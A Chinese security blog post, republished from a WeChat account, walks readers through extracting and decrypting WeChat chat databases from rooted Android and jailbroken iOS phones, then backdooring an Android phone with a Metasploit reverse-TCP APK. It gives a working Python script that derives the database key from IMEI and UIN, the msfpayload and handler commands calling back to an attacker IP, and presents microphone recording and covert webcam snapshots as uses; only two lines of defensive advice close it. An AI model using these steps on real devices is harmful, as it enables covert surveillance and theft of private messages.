实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

admin 2022年7月18日06:22:36评论174 views字数 9050阅读30分10秒阅读模式

在这篇文章中我们将讨论如何获取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。

“如何获取Android、iPhone手机上的微信聊天记录? ”

0×00 条件:

安卓设备已获取root权限,安装SSHDroid(通过sshftp连接手机)

Apple设备越狱,安装OpenSSH插件

0×01 安卓:

很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。

安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如,你在安卓设备上安装了微信,那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。    

Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下,微信App文件存放路径为:/data/data/com.tencent.mm/MicroMsg 

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   首先通过FTP把文件down到本地:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   34位编码(类似于乱码)命名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   

用数据库管理器打开:提示加密或者不是数据库文件

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   
  这里可以用windows环境下的SQLite Database Browser浏览器打开:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   
 提示输入密码:

 实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

那么,加密数据库使用的密码是什么呢?我们又该如何获取到这个密码?通过上网查资料了解到:微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。    

微信账号uin:即user information 微信用户信息识别码,获取微信UIN的方式有两种:

1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;

2.通过抓取WEB版微信聊天的数据包获取到uin。

1.1 App 配置文件

    find / -name “system_config_prefs.xml”

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   

/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

<int name="default_uin" value="146****21" />

1.2 谷歌chrome浏览器登陆WEB版微信:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
 登陆后新建窗口并访问chrome://net-internals/#events

发送信息 抓包 find uin

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   
 uin:146****21

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
   
 通过上述两种方法找到的uin值是相同的。

安卓拨号界面输入*#06#获得手机IMEI码:354**********85

IMEI值+uin值组合即为354**********85146****21    
   
   

md5:  http://www.spriteking.com/cmd5/  左侧加密

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
 
 得到32位小写md5值:1cbf8b842f8bf650aa65e5d3ced07735取其前七位:1cbf8b8输入到sql浏览器中。    

Linux、Mac用户也可以在终端执行:

echo -n "354**********85146****21" | md5sum | cut -c -7

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

成功打开微信的数据库文件:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
 

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
  Wechat2txt.py:gist.github.com

import os

import sys

import re

import hashlib

import csv

import time

import locale

import getopt





def get_db():

    os.popen('adb root').close()

    text = os.popen(

        'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()

    return text.splitlines()[- 1] if text else ''





def get_default_uin():

    os.popen('adb root').close()

    text = os.popen(

        'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()

    default_uin = re.findall(

        'name="default_uin" value="([0-9]+)"', text)

    return default_uin[0] if default_uin else 0





def get_device_ID():

    text = os.popen('adb shell dumpsys iphonesubinfo').read()

    device_ID = re.findall('Device ID = ([0-9]+)', text)

    return device_ID[0] if device_ID else 0





def get_md5():

    default_uin = get_default_uin()

    device_ID = get_device_ID()

    if default_uin and device_ID:

        return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]

    return ''





def parse_msgcsv(msgcsv):

    locale.setlocale(locale.LC_ALL, '')

    if hasattr(msgcsv, 'title'):

        msgcsv = [ooOoo0O + 'n' for ooOoo0O in msgcsv.splitlines()]

        pass

    OooO0 = csv.reader(msgcsv)

    OooO0.next()

    for ooOoo0O in OooO0:

        try:

            II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[

                : 12]

            pass

        except:

            continue

        ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name

        IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)

        I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)

        yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]

        pass

    pass





def get_names(chat):

    names = {}

    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:

        names[name] = 1

        pass

    return names.keys()





def oo(chat, name=''):

    text = []

    name = name.lower()

    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:

        iIi1ii1I1 = iIi1ii1I1.replace('n', 'n  ')

        o0 = ('t' + o0) if o0 else ''

        if not name:

            text.append('%s: %s %s: %s %s' %

                        (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))

            pass

        elif name.lower() == name:

            text.append('%s %s: %s %s' %

                        (I1IIIii, ooooooO0oo, iIi1ii1I1, o0))

            pass

        pass

    return 'n'.join(text) + 'n'





def IIIii1II1II(dbn, key=''):

    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])

    if key:

        child_stdin.write('PRAGMA key=%s;n' % ` key `)

        child_stdin.write('pragma cipher_use_hmac=off;n')

        pass

    child_stdin.write('.tablesn')

    child_stdin.close()

    return child_stdout.read().split()





def decrypt(dbn, key='', table='message'):

    table = table or 'message'

    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])

    child_stdin.write('.header onn')

    child_stdin.write('.mode csvn')

    if key:

        child_stdin.write('PRAGMA key=%s;n' % ` key `)

        child_stdin.write('pragma cipher_use_hmac=off;n')

        pass

    child_stdin.write('select * from %s;n' % ` table `)

    child_stdin.close()

    return child_stdout.read()


def wechat2txt(names=[]):

    in_file = 'EnMicroMsg.db'

    out_file = 'message.csv'

    db = get_db()

    md5 = get_md5()

    os.popen('adb wait-for-device')

    os.popen('adb pull %s %s' % (db, in_file)).close()

    msgcsv = decrypt(in_file, md5)

    if msgcsv.find('n') < 0:

        return 1

    file(out_file, 'w').write(msgcsv)

    msgs = list(parse_msgcsv(msgcsv))

    if not msgs:

        return 1

    if not names:

        names = get_names(msgs)

        pass

    for name in names:

        filename = 'message.%s.txt' % name

        text = oo(msgs, name)

        if len(text) > 4:

            file(filename, 'w').write(text)

            pass

        pass

    pass



help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...


OPTIONS:

    -h        display this help and exit

'''





def main():

    try:

        opts, args = getopt.getopt(sys.argv[1:], 'h')

    except getopt.error, e:

        print help_msg

        return 1

    for opt, arg in opts:

        if opt == '-h':

            print help_msg

            return 1

        pass

    names = args

    text = wechat2txt(names)

    return not text



if __name__ == "__main__":

    sys.exit(main())

0×02 苹果:

Apple设备越狱后可通过Cydia安装各种小插件,通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中,并使用sftp传输文件:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
           iOS中,应用文件夹以hash值命名,要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。

在实际操作中我们可以通过巧用Linux命令(find、grep、xargs)来绕过这些坑。

find /var/mobile/Containers/Data -name "MM.sqlite"   mkdir /cachefind /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

0×03 在安卓终端植入后门

3.1 实验环境

Kali Linux(Hack):192.168.31.213

Android(靶机):192.168.31.118

3.2生成后门文件: 

cd Desktop msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

3.3 运行metasploit控制台 

msfconsoleuse exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.31.213set LPORT 443run

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

3.4 安装&运行后门App

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
后门能进行什么操作?我们来看看usage:            

meterpreter > help  Core Commands =============      Command                   Description     -------                   -----------     ?                         Help menu     background                Backgrounds the current session     bgkill                    Kills a background meterpreter script     bglist                    Lists running background scripts     bgrun                     Executes a meterpreter script as a background thread     channel                   Displays information about active channels     close                     Closes a channel     disable_unicode_encoding  Disables encoding of unicode strings     enable_unicode_encoding   Enables encoding of unicode strings     exit                      Terminate the meterpreter session     help                      Help menu     info                      Displays information about a Post module     interact                  Interacts with a channel     irb                       Drop into irb scripting mode     load                      Load one or more meterpreter extensions     quit                      Terminate the meterpreter session     read                      Reads data from a channel     resource                  Run the commands stored in a file     run                       Executes a meterpreter script or Post module     use                       Deprecated alias for 'load'    write                     Writes data to a channel   Stdapi: File system Commands ============================      Command       Description     -------       -----------     cat           Read the contents of a file to the screen     cd            Change directory     download      Download a file or directory     edit          Edit a file     getlwd        Print local working directory     getwd         Print working directory     lcd           Change local working directory     lpwd          Print local working directory     ls            List files     mkdir         Make directory     pwd           Print working directory     rm            Delete the specified file     rmdir         Remove directory     search        Search for files     upload        Upload a file or directory   Stdapi: Networking Commands ===========================      Command       Description     -------       -----------     ifconfig      Display interfaces     ipconfig      Display interfaces     portfwd       Forward a local port to a remote service     route         View and modify the routing table   Stdapi: System Commands =======================      Command       Description     -------       -----------     execute       Execute a command     getuid        Get the user that the server is running as     ps            List running processes     shell         Drop into a system command shell     sysinfo       Gets information about the remote system, such as OS   Stdapi: Webcam Commands =======================      Command       Description     -------       -----------     record_mic    Record audio from the default microphone for X seconds     webcam_list   List webcams     webcam_snap   Take a snapshot from the specified webcam

record_mic 通过手机麦克风进行窃听、录音;

webcam_list 列出安卓设备的所有摄像头;

webcam_snap 通过摄像头进行偷拍…

等等

0×04 演示视频


0×05 APK后门分析:

把apk放到apk分析工具(apkStudio、Bytecodeviewer)进行解包,我们来看看后门App的源码:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

(apkStudio)


在smali/com/metasploit/stage/MainActivity.smali中我们可以找到后门服务器的ip端口配置:

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓            

(apkStudio)

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

(Bytecodeviewer)

0×06 预防&安全建议

安卓:从可信来源下载应用程序,避免感染恶意程序;在移动充电桩充电前及时关闭USB调试。

苹果:越狱后及时修改root密码,避免使用默认密码、弱口令。

0×07 文中工具下载地址:

SQLite Database Browserhttp://pan.baidu.com/s/1nuWlDgd

SSHDroid:http://pan.baidu.com/s/1b6PBK6            

     

*本文投稿作者:雪碧0xroot@漏洞盒子安全团队,文章首发于freebuf。

扫码关注玄魂工作室,精彩不断。

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

更多实战类文章,回复"实战"进行查看。

原文始发于微信公众号(玄魂工作室):实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月18日06:22:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓https://cn-sec.com/archives/783816.html

发表评论

匿名网友 填写信息